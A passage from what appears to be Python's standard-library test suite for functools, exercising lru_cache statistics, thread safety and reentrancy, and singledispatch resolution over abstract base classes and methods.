self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
